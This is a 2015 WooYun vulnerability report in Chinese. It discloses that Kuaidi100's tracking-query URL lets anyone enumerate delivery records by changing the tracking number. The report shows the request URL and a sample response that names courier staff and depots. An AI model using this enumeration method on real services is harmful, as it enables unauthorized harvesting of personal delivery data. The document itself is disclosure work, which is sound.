漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-099494
漏洞标题:快递100官方可利用源码获取万条订单记录
相关厂商:快递100
漏洞作者: 0x 80
提交时间:2015-03-04 18:03
修复时间:2015-04-18 18:04
公开时间:2015-04-18 18:04
漏洞类型:敏感信息泄露
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
匿名利用源码获取万条订单
详细说明:
http://www.kuaidi100.com/query?id=1&postid=300003849895&temp=0.8066521694418043&type=quanfengkuaidi&valicode=
漏洞证明:
其中postid=订单号,直接替换即可,没有任何加密!
{"message":"ok","nu":"300003849896","companytype":"quanfengkuaidi","ischeck":"1","com":"quanfengkuaidi","updatetime":"2015-03-04 17:09:41","status":"200","condition":"F00","codenumber":"300003849896","data":[{"time":"2013-04-29 18:41:32","location":"","context":"派件已【签收】,签收人是【本人】签收网点是【福州台江站】","ftime":"2013-04-29 18:41:32"},{"time":"2013-04-27 10:09:15","location":"","context":"【福州台江站】的【福州台江站】正在派件,扫描员是【福州台江站】备注【 】","ftime":"2013-04-27 10:09:15"},{"time":"2013-04-27 09:39:37","location":"","context":"快件到达【福州台江站】,上一站是【福州分拨中心】扫描员是【福州台江站】备注【 】","ftime":"2013-04-27 09:39:37"},{"time":"2013-04-27 08:47:47","location":"","context":"快件在【福州分拨中心】装车,正发往【福州台江站】扫描员是【韩海东】备注【 】","ftime":"2013-04-27 08:47:47"},{"time":"2013-04-26 19:28:01","location":"","context":"快件到达【福州分拨中心】,上一站是【临海分拨中心】扫描员是【林锋】备注【 】","ftime":"2013-04-26 19:28:01"},{"time":"2013-04-26 06:42:40","location":"","context":"快件在【临海分拨中心】装车,正发往【福州分拨中心】扫描员是【魏仕炎】备注【 】","ftime":"2013-04-26 06:42:40"},{"time":"2013-04-26 06:42:28","location":"","context":"快件到达【临海分拨中心】,上一站是【上海分拨中心】扫描员是【杨涛】备注【 】","ftime":"2013-04-26 06:42:28"},{"time":"2013-04-25 20:01:30","location":"","context":"快件在【上海分拨中心】装车,正发往【福州分拨中心】扫描员是【吴军联】备注【 】","ftime":"2013-04-25 20:01:30"},{"time":"2013-04-25 19:56:06","location":"","context":"快件到达【上海分拨中心】,上一站是【上海市场部】扫描员是【杨齐】备注【 审核中转费计算】","ftime":"2013-04-25 19:56:06"},{"time":"2013-04-25 17:38:30","location":"","context":"快件在【上海良无限】装车,正发往【上海】扫描员是【上海良无限】备注【 】","ftime":"2013-04-25 17:38:30"},{"time":"2013-04-25 17:36:56","location":"","context":"【上海良无限】的【上海良无限】已收件,扫描员是:【上海良无限】,备注【 】","ftime":"2013-04-25 17:36:56"}],"state":"3"}
修复方案:
版权声明:转载请注明来源 0x 80@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝